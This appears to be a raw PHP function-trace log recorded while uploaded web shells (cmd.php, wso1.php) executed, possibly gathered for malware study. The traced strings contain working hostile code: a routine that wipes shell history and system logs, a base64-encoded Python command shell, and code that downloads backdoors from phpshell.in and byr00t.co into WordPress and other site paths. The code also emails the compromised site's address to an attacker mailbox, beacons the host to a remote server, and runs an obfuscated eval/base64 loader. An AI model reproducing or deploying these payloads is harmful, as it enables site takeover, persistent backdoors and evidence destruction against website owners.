/tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;\r\n&#305;\r\nlamad&#305;\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . "/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . "/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . "/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n'	/var/www/html/uploads/cmd.php(4) : eval()'d code	1	0
4	13	0	0.007871	1143752	base64_decode	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	16	1	'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4	13	1	0.007902	1143840
4	13	R			'http://byr00t.co/l-'
4	14	0	0.007928	1143808	GetIP	1		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	16	0
5	15	0	0.007950	1143808	getenv	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	3	1	'HTTP_CLIENT_IP'
5	15	1	0.007975	1143840
5	15	R			FALSE
5	16	0	0.007998	1143808	getenv	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	5	1	'HTTP_X_FORWARDED_FOR'
5	16	1	0.008023	1143840
5	16	R			FALSE
5	17	0	0.008045	1143808	getenv	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	12	1	'REMOTE_ADDR'
5	17	1	0.008069	1143880
5	17	R			'127.0.0.1'
4		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	12	$ip = '127.0.0.1'
4	14	1	0.008112	1143848
4	14	R			'127.0.0.1'
4	18	0	0.008136	1143872	base64_encode	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	16	1	'http://localhost/uploads/cmd.php'
4	18	1	0.008158	1143984
4	18	R			'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA='
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	16	$x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA='
4	19	0	0.008208	1143864	function_exists	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	17	1	'curl_init'
4	19	1	0.008229	1143904
4	19	R			TRUE
4	20	0	0.008251	1143864	curl_init	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	0
4	20	1	0.008283	1144776
4	20	R			resource(3) of type (curl)
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	$ch = resource(3) of type (curl)
4	21	0	0.008326	1144776	curl_setopt	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	10002	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA='
4	21	1	0.008357	1144872
4	21	R			TRUE
4	22	0	0.008378	1144776	curl_setopt	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	19913	TRUE
4	22	1	0.008401	1144872
4	22	R			TRUE
4	23	0	0.008421	1144776	curl_exec	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	23	1	0.055755	1144808
4	23	R			''
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	$gitt = ''
4	24	0	0.055821	1144776	curl_close	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	24	1	0.055893	1143920
4	24	R			NULL
4	25	0	0.055915	1143888	file_get_contents	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	21	1	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA='
4	25	1	1.028402	1147584
4	25	R			''
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	21	$gitt = ''
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	26	$auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	27	$color = '#00ff66'
3		A						/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	28	$default_action = 'FilesMan'
4	26	0	1.028518	1147544	define	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	29	2	'SELF_PATH'	'/var/www/html/uploads/cmd.php(4) : eval()\'d code(1) : eval()\'d code'
4	26	1	1.028566	1147648
4	26	R			TRUE
4	27	0	1.028582	1147576	strpos	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	30	2	'python-requests/2.25.1'	'Google'
4	27	1	1.028624	1147648
4	27	R			FALSE
4	28	0	1.028648	1147576	session_start	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	32	0
4	28	1	1.028717	1148328
4	28	R			TRUE
4	29	0	1.028732	1148328	error_reporting	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	33	1	0
4	29	1	1.028746	1148368
4	29	R			0
4	30	0	1.028759	1148328	ini_set	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	34	2	'error_log'	NULL
4	30	1	1.028775	1148400
4	30	R			''
4	31	0	1.028787	1148328	ini_set	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	35	2	'display_errors'	0
4	31	1	1.028802	1148400
4	31	R			''
4	32	0	1.028814	1148328	ini_set	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	36	2	'log_errors'	0
4	32	1	1.028828	1148400
4	32	R			'1'
4	33	0	1.028840	1148328	ini_set	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	37	2	'max_execution_time'	0
4	33	1	1.028856	1148432
4	33	R			'30'
4	34	0	1.028869	1148328	set_time_limit	0		/var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code	38	1	0
4	34	1	1.028883	1148392
4	34	R			FALSE
3	12	1	1.028905	1149824
2	7	1	1.028922	1062800
1	3	1	1.028929	1061224
1	35	0	1.028937	1061256	Error->__toString	0		Unknown	0	0
2	36	0	1.028949	1061336	Error->getTraceAsString	0		Unknown	0	0
2	36	1	1.028961	1061592
2	36	R			'#0 /var/www/html/uploads/cmd.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/cmd.php(4): eval()\n#2 {main}'
1	35	1	1.028981	1065728
1	35	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/cmd.php(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/cmd.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/cmd.php(4): eval()\n#2 {main}'
			1.029034	986224
TRACE END   [2023-02-12 22:46:00.695253]

data/traces/9d98853a714da34855a92cb5ba345601_trace-1676249253.5392.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:47:59.437057]
1	0	1	0.000132	393512
1	3	0	0.000359	426920	{main}	1		/var/www/html/uploads/wso1.php	0	0
1		A						/var/www/html/uploads/wso1.php	2	$stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1		A						/var/www/html/uploads/wso1.php	3	$stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2	4	0	0.000438	426920	base64_decode	0		/var/www/html/uploads/wso1.php	4	1	'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2	4	1	0.000457	427080
2	4	R			'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	0	0.000478	427048	gzinflate	0		/var/www/html/uploads/wso1.php	4	1	'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	1	0.000500	427176
2	5	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
